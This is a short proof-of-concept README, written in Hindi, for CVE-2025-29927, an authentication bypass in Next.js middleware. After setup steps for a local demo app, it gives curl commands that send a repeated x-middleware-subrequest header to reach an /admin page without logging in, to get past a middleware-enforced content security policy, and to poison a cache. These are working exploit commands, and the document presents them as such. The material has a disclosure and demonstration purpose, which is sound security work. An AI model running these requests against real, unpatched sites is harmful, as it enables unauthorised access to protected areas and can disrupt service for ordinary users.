
CVE-2025-29927 Proof of Concept
यह PoC CVE-2025-29927 को प्रदर्शित करता है, जो Next.js मिडलवेयर में एक कमजोरी है जो हमलावरों को x-middleware-subrequest हेडर का उपयोग करके प्रमाणीकरण, प्राधिकरण और CSP तंत्र को बायपास करने की अनुमति देता है।
Next.js संस्करण 11.1.4 से 15.1.7
1️⃣ PoC को क्लोन और इंस्टॉल करें
git clone https://github.com/Eve-SatOrU/POC-CVE-2025-29927.git
cd POC-CVE-2025-29927
cd Demo
cd my-next-app
npm install
npm run dev
एप http://localhost:3000 पर शुरू होगा।
1- अनधिकृत पहुंच प्राप्त करने के लिए x-middleware-subrequest का उपयोग करें:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin
💥 अपेक्षित परिणाम: प्रतिक्रिया admin admin लौटाती है, भले ही प्रमाणीकरण को बायपास किया गया हो।

यदि CSP मिडलवेयर के माध्यम से लागू किया गया है, तो इसे बायपास करें:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "Content-Security-Policy: default-src 'self'" \
http://localhost:3000/admin
💥 अपेक्षित परिणाम: CSP को नजरअंदाज कर दिया जाता है, जिससे दुर्भावनापूर्ण स्क्रिप्ट निष्पादन की अनुमति मिलती है।
गलत प्रतिक्रिया को मजबूर करके कैश पॉइज़निंग का शोषण करें:
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" \
-H "Cache-Control: public, max-age=3600" \
http://localhost:3000/admin
💥 अपेक्षित परिणाम: पेज गलत सामग्री के साथ कैश हो जाता है, जो सामान्य उपयोगकर्ताओं को बाधित करता है।
🔍 खोजकर्ता: Allam Rachid (zhero;) और Allam Yasser (inzo_)